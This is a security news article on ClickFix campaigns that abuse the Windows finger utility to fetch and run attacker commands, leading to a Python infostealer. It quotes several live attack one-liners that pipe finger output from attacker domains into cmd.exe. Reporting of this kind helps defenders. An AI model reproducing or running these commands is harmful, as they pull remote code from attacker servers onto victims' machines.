The decades-old ‘finger’ command, a utility historically used to look up information about users on Unix and Linux systems via the Finger protocol, is experiencing a troubling resurgence. Although the command was later ported to Windows and is still supported, its general use has significantly declined since its popularity decades ago. However, security researchers have noted that threat actors are now leveraging this dormant protocol to execute remote commands on compromised Windows devices.
When executed, the legitimate finger command is designed to return basic details about a user, such as their login name, home directory, and last seen activity. Unfortunately, recent malicious campaigns are utilizing the Finger protocol in what are appearing to be ClickFix attacks. These social engineering schemes prompt the victim to run a seemingly harmless Windows command, which secretly uses the finger utility to retrieve and run commands supplied from a remote server. This is not a completely novel technique; researchers previously warned in 2020 that finger was being used as a Living Off the Land Binary (LOLBIN) to download malware and evade security detection.
A recent example, shared by cybersecurity researcher MalwareHunterTeam, involved a batch file that used the command finger root@finger.nateams[.]com and piped its output through cmd.exe. This method caused the remote server’s response to be executed as local commands. Another highly public example occurred when a person on Reddit detailed how they fell victim to a ClickFix attack impersonating a Captcha verification, which tricked them into running a malicious command. The victim entered a command similar to cmd /c start “” /min cmd /c “finger vke@finger.cloudmega[.]org | cmd”, unknowingly setting the stage for the attack.
The core of this attack is the abuse of the Finger protocol as a remote script delivery method. By piping the output of the finger request directly into the Windows command processor, cmd.exe, the commands supplied by the attacker’s server are executed immediately. In one captured attack, the executed script created a random-named path, copied curl.exe to a random filename, and then used the renamed curl to download a zipped malware package disguised as a PDF. This package was then extracted to run a Python malware program using pythonw.exe.
While the exact nature of all payloads is not fully confirmed, a related batch file suggests that this Python package acts as an infostealer. The final action of the script often involves a call back to the attacker’s server to confirm successful execution, alongside displaying a fake “Verify you are human” prompt to the user to maintain the deception. MalwareHunterTeam has also identified similar campaigns using different domains, such as one employing finger Kove2@api.metrics-strange.com | cmd, indicating this exploitation technique is currently widespread and actively being used by various threat groups.
Reference:
